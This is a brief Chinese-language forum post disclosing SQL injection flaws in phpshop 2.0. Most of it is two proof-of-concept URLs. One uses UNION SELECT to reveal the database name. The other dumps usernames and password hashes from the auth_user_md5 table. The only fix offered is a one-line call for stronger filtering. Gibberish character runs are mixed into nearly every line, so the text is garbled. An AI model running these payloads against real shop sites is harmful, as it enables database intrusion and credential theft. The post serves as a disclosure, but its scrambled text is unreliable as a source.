标题 : phpshop 2.0 SQL Injection Vulnerability
; O' D" E! w: l
+ B" h" h2 O1 y, Q作者 : By onestree; j# U$ X& J+ y: x1 t9 ^
下载地址 : http://code.google.com/p/phpshop/downloads/list8 f V# e( H& D! U
测试地址: windows 7 / ubuntu' b' V; k% w b. g Q
* Q( i# R. I9 H. D& a # S) `% T$ n/ H
SQLi p0c:- k" p+ h% j; U
9 Z; ]0 Y) o% T) t. u# t
==================1 c: K; a4 L0 R2 X2 k0 ~- D
0 ?) j* h, E3 K$ j9 k# M
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
$ W( ~% l1 f0 s. n0 t! @2 Iunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --& N m2 J( [* ]: v. q
/ R! d6 f% e2 b2 {6 w4 U
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--" b" ]8 v) F6 m5 B* E# f, M/ ]
- `: M6 O, e" ^/ ] W( _ E9 [7 e
修复:
; N& `! k- I `7 C" } N加强过滤
2 T/ S+ x! J0 A- \
- }* f) P' e( {; H& V6 w' r
! @. C& r* ^% ?6 A9 A6 v |